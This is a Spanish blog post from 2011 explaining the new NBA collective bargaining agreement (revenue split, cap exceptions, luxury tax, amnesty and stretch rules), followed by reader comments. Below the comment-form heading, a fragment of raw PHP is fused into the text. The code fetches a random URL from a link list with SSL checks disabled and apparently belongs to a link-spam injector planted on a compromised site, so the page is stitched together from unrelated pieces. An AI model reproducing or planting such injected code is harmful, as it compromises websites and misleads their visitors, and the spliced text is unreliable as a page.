Detalles del nuevo convenio

29 de November de 2011 por txusma

Propietarios y jugadores siguen negociando los flecos del nuevo convenio que firmarán posiblemente el próximo 5 o 6 de diciembre. Mientras, los detalles del acuerdo empiezan a aflorar. Échemos un vistazo a los más interesantes:

Reparto del BRI (Basketball Related Income): El que ha sido el principal caballo de batalla de las negociaciones se ha resuelto finalmente de una manera salomónica. 50% para cada una de las partes. Este reparto se reajustará en función de los ingresos pero los jugadores nunca recibirán menos del 49% ni más del 51%. En este primer año, éstos se harán con el 51,15%. Los jugadores han visto rebajado su porcentaje desde el 57%, una importante cesión, sin ningunda duda.

Excepciones al tope salarial: El tope salarial se calcula igual que en 2005 pero se ha remodelado un poco el sistema de excepciones:

  • Non-Taxpayer Mid-Level Exception: Los equipos que no pagan impuesto de lujo pueden ofrecer un contrato de 5 millones de dólares en  los dos primeros años con un crecimiento posterior de un 3% anual. La duración máxima del contrato será de 4 años. Esta excepción puede ser usada todos los años. Viene a ser la Mid-Level de toda la vida.
  • Taxpayer Mid-Level Exception: En cambio, los equipos que pagan impuesto de lujo solo podrán ofrecer un contrato de 3 millones de dólares con un crecimiento anual del 3%. La duración máxima del contrato es de 3 años. También puede ser usada todos los años.
  • Mid-level Exception for Room Teams: Los Room Teams son los equipos que están por debajo del límite salarial. Estos equipos podrán ofrecer contratos de 2 años a agentes libres de un máximo de 2,5 millones de dólares en su primer año y un 3% más el segundo. En el anterior convenio los equipos por debajo del límite salarial no podían utilizar ningún tipo de excepción.
  • Bi-Annual Exception: Prácticamente igual que en el anterior convenio con la diferencia de que no la podrán utilizar los equipos que paguen impuesto de lujo.
  • La Traded Player Exception y la Disabled Player Exception se mantienen prácticamente igual.
Mínimo gasto salarial: Los equipos tendrán que gastar obligatoriamente en salarios el 85% del tope salarial y el 90% a partir del tercero. Hasta ahora era el 75%. Equipos como los Nuggets o los Kings que ahora mismo sólo tienen comprometidos unos 29 millones de dólares deberán incorporar jugadores obligatoriamente hasta pagar unos 43,5 millones.

Impuesto de lujo: Los límites se calculan también como en el CBA de 2005 pero hay importantes cambios en la tasa a pagar. El primer y segundo año del convenio se seguirá pagando 1 dólar por cada dólar sobre el límite establecido. A partir del 3er año (temporada 2014-2015) la cosa cambia:

  • Por encima del límite entre 0 y 5 millones: pago de 1,5 dólares por cada dólar que lo supere
  • Por encima del límite entre 5 y 10 millones: pago de 1,75 dólares por cada dólar que lo supere
  • Por encima del límite entre 10 y 15 millones: pago de 2,50 dólares por cada dólar que lo supere
  • Por encima del límite entre 15 y 20 millones: pago de 3,25 dólares por cada dólar que lo supere

Y a partir de aquí, el impuesto sube 0,5 millones por cada 5 millones más (p.e. un equipo que esté 23 millones por encima pagará 3,75 dólares por cada dolar. Es decir, nada más y nada menos que 86.25 millones de dólares. Un equipo como los Lakers de esta temporada, que estará 21 millones por encima del límite, tendría muchos problemas). Además, los equipos que superen el límite en 4 de las últimas 5 temporadas verán incrementado su impuesto en un 1 dólar.

Finalmente, si un equipo utiliza la Non-Taxpayer Mid-Level Exception o la Bi-Annual Exception no podrá pasarse más de 4 millones del límite del impuesto de lujo durante esa temporada. A partir del 3er año tampoco lo podrán hacer los equipos que fichan un jugador mediante un sign-and-trade. Es decir, una franquicia no podrá hacer un sign-and-trade si después de hacerlo se queda 4 kilos por encima del límite del impuesto de lujo.

Duración de los contratos: La máxima duración de los contratos será de 5 años para los Bird Players (vienen a ser los que renuevan con su equipo) y de 4 para el esto. En el anterior convenio era un año más en ambos casos. A los rookies solo se les pondrá extender el contrato por 4 años excepto a un “Jugador Designado” al que se le podrá extender 5 siempre que se le pague el salario máximo. Una franquicia solo puede tener un “Jugador Designado” en la plantilla. Interesante decisión estratégica la que deberán abordar los GM.

‘Norma Derrick Rose’: Los salarios máximos individuales siguen las mismas normas que en el CBA de 2005 con una interesante excepción. Un jugador al que se le acabe el contrato rookie podrá cobrar hasta un 30% del tope salarial siempre que haya sido seleccionado 2 veces para el All-Stars o haya sido elegido 2 veces para alguno de los mejores equipos de la temporada o haya sido MVP de la liga regular. Está claro porque se le empieza a conocer a este punto como la Norma Rose, ¿no? Blake Griffin lleva también un All-Star y con otro más ya podrá acogerse a esta norma. Hablamos de un aumento de unos 17 kilos durante toda la extensión. No está mal como elemento motivador.

Strech Exception: Las franquicias podrán cortar a un jugador y pagarle el resto de su contrato en un período igual a 2 veces lo que le resta de contrato más 1. Pero sólo lop odrán hacer con contratos firmados bajo el nuevo convenio. Por ejemplo, si imaginamos que Rashard Lewis firmó con el nuevo convenio y los Wizards lo quieren cortar en lugar de tener que pagar 22 kilos este año y 23 el siguiente podrían pagar 9 kilos durante los siguientes 5 años. Otra posibilidad más en la que pensar. De todas maneras para no abusar de esta excepción, el salario total de los jugadores cortados no puede superar un porcentaje por determinar del tope salarial.

Ofertas de tanteo: Los equipos deberán decidir si igualan la mejor oferta de sus agentes libres restringidos en 3 días en lugar de los 7 de ahora.

Igualar salarios en traspasos: Será mucho más fácil cuadrar salarios porque los equipos por encima del límite salarial pero por debajo del límite del impuesto de lujo podrán traspasar jugadores recibiendo hasta un 150% de salario. Los equipos por encima del límite del impuesto de lujo siguen con el 125%.

Extend-and-trade: Los propietarios han buscado que se creara una ‘norma Carmelo Anthony’, es decir prohibir que un jugador pueda renovar y automáticamente ser traspasado. Desgraciadamente para ellos no lo han conseguido y gente como Chris Paul o Dwight Howard podrían seguir los pasos del jugador de los Knicks. Eso sí, con una diferencia y es que si lo hacen ganarán mucho menos dinero al no poder acogerse a las ventajas de los jugadores Bird (1 año más de contrato y algo más de dinero)

Traspasos de mentirijilla: Hasta ahora estábamos acostumbrados a que un equipo traspasara a un jugador, este fuera cortado por su nuevo equipo y en pocos días volviera a firmar por la franquicia inicial (Zydrunas Ilgauskas y los Cavs, por ejemplo). Pues ahora se amplia el plazo. Deberá pasar 1 año antes de que el jugador pueda firmar  de nuevo por su franquicia original. A la práctica parece que se acabaran este tipo de movimientos.

Amnistía: Cada año los equipos podrán cortar a un jugador con un contrato firmado bajo el anterior convenio. El equipo le continuará pagando pero su salario ya no contará para en los cálculos salariales. Si este jugador firma por otra franquicia entonces la franquicia que lo cortó sólo ha de pagar la diferencia entre el salario antiguo y el nuevo. Gilbert Arenas, Brandon Roy o Joe Johnson suenan para convertirse en los primeros jugadores a los que se les aplica la norma. No así Rashard Lewis y es que recordemos que los Wizards han de pagar obligatoriamente 43 millones en salario. Si echan a Lewis les costaría mucho llegar a esta cifra.

Duración del convenio: 10 años pero a partir del sexto cualquiera de las 2 partes lo puede romper.

 Espero que con este repaso os hayamos ayudado a entender mejor los cambios que suponen el nuevo convenio colectivo. Si tenéis alguna duda lo podemos debatir en los comentarios.

Comenta

13 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Supongo que todo se tiene que hilar mejor. Sobre la cláusula de amnistía que es lo que a mí más me llama la atención la segunda parte de la historia parece un poco irrelevante.
    El jugador que resulta cortado lo que querrá es jugar y en esos términos le da igual quien le pague el montante. Lo más lógico es que el equipo que le haga un hueco pagará bien poquito y la ruina se la sigue comiendo el equipo original.
    Así que la cuestión será cómo deciden los equipos tirar literalmente el dinero para abrir hueco salarial. Difícil papeleta.

      Citar

  2. Esteban dice:
    #2

    tanto lio para esto?
    una fucking clausula de anmistia que nisiquiera se le aplicar a lewis, modifican plazos de 7 a 3 dias, y dos nuevas excepciones, la verdad una verguenza, perder tanto tiempo para esto da bronca

      Citar

  3. HisRoyalAirness dice:
    #3

    Esteban:
    tanto lio para esto?
    una fucking clausula de anmistia que nisiquiera se le aplicar a lewis, modifican plazos de 7 a 3 dias, y dos nuevas excepciones, la verdad una verguenza, perder tanto tiempo para esto da bronca

    Esteban creo que has entendido mal, la cláusula de amnistía sí se le puede aplicar a Lewis, lo que dice Txus es que si lo cortaran tendrían que contratar jugadores para cubrir el mínimo salarial además de seguirle pagando (o eso he entendido yo).

    Gracias por el resúmen!

    Por cierto, los rumores de Howard están que arden y todo pinta que Bulls, Lakers o Celtics.
    También decían que Lakers, además de howard querían a CP3 pero me parece una fantasmada, no pega con Kobe ni con cola

      Citar

  4. Txusma dice:
    #4

    Efectivamente, a Lewis se le podría aplicar la cláusula (y tb a Kobe) pero los Wizards tienen muy poco montante salarial ahora mismo y si eliminan el salario de Lewis aún menos (se quedarían en 18 millones!). Imaginad todo lo que han de fichar para llegar a los 43’5 que son el mínimo. Si no se hacen con las grandes piezas los veo fichando a medianías por auténticas barbaridades.

      Citar

  5. Hynreck dice:
    #5

    Tremendo Txus! Gracias por el resumen!!

      Citar

  6. Esteban dice:
    #6

    gracias por la explicacion, no habia entendido el 100% pero entendi que era aplicable a lewis, pero que no se le aplicaria al fin de al cabo, el de lewis es el peor contrato de la nba y por ciertas razones no se le aplicara, mucho ruido para nada a mi entender

    viendo los espacios salariales, veo a los nets yendo a la carga por caron butler y david west, no lo creen?

      Citar

  7. jas dice:
    #7

    Pero se me ocurre una trampa en la norma de la amnistía… algún equipo podría cortar a un jugador, pagarle lo que le tenga que pagar y volver a firmarlo por una miseria, al jugador le da igual va a cobrar lo mismo y el equipo consigue bajar dl limite salarial si lo sobrepasa y acometer nuevos fixajes. Esso se podría hacer?

      Citar

  8. jas dice:
    #8

    perdón no habia leido el punto anterior… xD

      Citar

  9. Campo2 dice:
    #9

    Esteban: gracias por la explicacion, no habia entendido el 100% pero entendi que era aplicable a lewis, pero que no se le aplicaria al fin de al cabo, el de lewis es el peor contrato de la nba y por ciertas razones no se le aplicara, mucho ruido para nada a mi entenderviendo los espacios salariales, veo a los nets yendo a la carga por caron butler y david west, no lo creen?

    espero que no vayan a por esos dos y si a por Millsap que lo quieren traspasar a por Wilson Chandler si consigue salir de China y traspasar a lopez y algo mas por Howard

      Citar

  10. Esteban dice:
    #10

    sobre lo de lewis, no estoy de acuerdo en no usar su anmistia

    es verdad que quedarin en 18 millones, pero q va, con tanto espacio se le pueden hacer dos buenas ofertas a butler, west y young
    ellos 3 mas un nucleo de jugaodres jovenes comandados por una futuro all star como wall, y con jugadores mediocres pero con saladios acordes a su mediocridad como Andray Blatche, Jordan Crawford, JaVale McGee, Trevor Booker y Kevin Seraphin, mas vasely, aun tendria mas de 20 millones debajo del impuesto de lujo para el proximo año, y serian un equipo bastante mas atractivo para fichar a howard

    digamos q wall, young, butler, west y el puiesto de pivot para howard
    una banca con crawford, blatche, mcgee, y un base mas que ande por ahi, es un equipo q puede tener aspiraciones, sobre todo si wall cumple con lo que apunta

      Citar

  11. TheDeerHunter dice:
    #11

    Pues si se quejaban de pérdidas y hacen eso es para caparlos.

      Citar

  12. Txusma dice:
    #12

    Esteban no olvides que aunque se utilitce la Amnistia con Lewis a este hay q pagarle igual. Es decir, estarías pagando a Lewis sus 20 kilos y luego a Butler, West y Young… Mucha pasta es eso.

      Citar

  13. Jose_Dantley dice:
    #13

    mmm, mucho que analizar. Habrá que estudiarlo con detalle, pero me da a mí que va a causar mucho más impacto del que se ve a simple vista

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>